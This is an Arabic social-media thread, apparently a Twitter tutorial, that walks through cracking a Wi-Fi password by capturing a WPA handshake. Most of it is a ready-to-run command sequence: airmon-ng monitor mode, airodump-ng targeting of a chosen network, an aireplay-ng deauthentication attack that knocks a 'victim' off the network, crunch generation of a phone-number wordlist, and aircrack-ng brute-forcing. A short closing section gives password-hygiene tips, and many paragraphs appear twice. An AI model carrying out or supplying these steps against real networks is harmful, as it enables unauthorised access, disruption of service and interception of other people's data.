في البداية لازم نعرف طرق إختراق الشبكات وهي ثلاث طرق :
1- يكون نظام التشفير WPS
2- عبر Handshake
3- الهندسة الإجتماعية
في هذا الثريد راح نتعلم طريقة الإختراق عبر Handshake.
* تكلمنا في ثريد سابق عن الإختراق عبر الهندسة الإجتماعية بإمكانكم الرجوع له 👨🏻💻.
1- يكون نظام التشفير WPS
2- عبر Handshake
3- الهندسة الإجتماعية
في هذا الثريد راح نتعلم طريقة الإختراق عبر Handshake.
* تكلمنا في ثريد سابق عن الإختراق عبر الهندسة الإجتماعية بإمكانكم الرجوع له 👨🏻💻.
أول شيء لازم يكون عندك جهاز alfa علشان نقدر نحصل على Handshake، ومهم أن يدعم مود monitor. بعد ماتشغل جهاز alfa في كالي لينكس تكتب في Terminal
1- airmon-ng
2- airmon-ng check
3- airmon-ng check kill
4- airmon-ng start wlan0
وبكذا مبروك تحول إلى مود monitor
1- airmon-ng
2- airmon-ng check
3- airmon-ng check kill
4- airmon-ng start wlan0
وبكذا مبروك تحول إلى مود monitor
الآن تنتقل للخطوة اللي بعدها
وتكتب airodump-ng wlan0mon
وعن طريق هذه الأداه راح يطلع لك كل الشبكات القريبه منك.
الآن حدد الشبكة اللي تبغى تخترقها وسوي لنسخ للماك أدرس وأكتب airodump-ng —bssid (حط الماك ادرس) —channel (حط رقم القناة الشبكة) wlan0mon.
وتكتب airodump-ng wlan0mon
وعن طريق هذه الأداه راح يطلع لك كل الشبكات القريبه منك.
الآن حدد الشبكة اللي تبغى تخترقها وسوي لنسخ للماك أدرس وأكتب airodump-ng —bssid (حط الماك ادرس) —channel (حط رقم القناة الشبكة) wlan0mon.
وبعدها راح تبدأ الأداة تراقب الشبكة والمتصلين عليها. وعلشان تحصل Handshake لازم تسوي هجوم dos على الشبكة علشان تعلق ويرجع الضحية يشبك عليها وتحصل Handshake.
وعلشان تسوي هجوم dos تفتح صفحة جديدة في Terminal وتكتب
aireplay-ng –deauth 0 -a <الماك ادرس> wlan0mon0
وبكذا بدأ هجوم dos
وعلشان تسوي هجوم dos تفتح صفحة جديدة في Terminal وتكتب
aireplay-ng –deauth 0 -a <الماك ادرس> wlan0mon0
وبكذا بدأ هجوم dos
بعد ما يبدأ هجوم dos على الشبكة راح تعلق ويضطر أحد المتصلين يرجع يشبك عليها من جديد وبمجرد ما يشبك انت تحصل على ملف handshake وتوقف كل شيء وتنتقل لخطوة التخمين عبر أداة crunch طبعًا في التخمين راح تأخد وقت ممكن يصل إلى يوم كامل
علشان تبدأ تخمن وفي هذا الحالة راح اخمن على أرقام جوالات تكتب في الأداة الأمر التالي:
crunch 10 10 0123456789 > wordlist.txt
وبعد ماتسوي لك الأداة list تضمن عشر خيارات من الأرقام تنتقل للخطوة التالية وتكتب
crunch 10 10 0123456789 > wordlist.txt
وبعد ماتسوي لك الأداة list تضمن عشر خيارات من الأرقام تنتقل للخطوة التالية وتكتب
تكتب:
aircrack-ng (مكان ملف handshake) -w wordlist
بعدها راح تبدأ الأداة تخمن الباسورد وبتأخذ وقت علشان تحصل الباسورد وانتبه يكون جهازك ضعيف لان العملية متعبة على الجهاز.
aircrack-ng (مكان ملف handshake) -w wordlist
بعدها راح تبدأ الأداة تخمن الباسورد وبتأخذ وقت علشان تحصل الباسورد وانتبه يكون جهازك ضعيف لان العملية متعبة على الجهاز.
إذا حلصت الأداة الرقم راح يطلع لك كما موضح في الصورة، وبكذا مبروك قدرت تجيب الباسورد وتدخل على الشبكة (وهذا جدًا خطير لأن بإيمكان المخترق معرفة خصوصيتك وجعل بياناتك تتدفق عبر جهازه وقراءة أرقامك السرية.
#نصائح |
*دائمًا أجعل كلمة السر تتكون من أرقام وأحرف كبيرة وصغيره.
*لا تضع رقم هاتفك أو رقم هاتف أحد أقربك.
*لا تضع نظام تشفير ضعيف مثل WPS.
*دائمًا أجعل كلمة السر تتكون من أرقام وأحرف كبيرة وصغيره.
*لا تضع رقم هاتفك أو رقم هاتف أحد أقربك.
*لا تضع نظام تشفير ضعيف مثل WPS.
جاري تحميل الاقتراحات...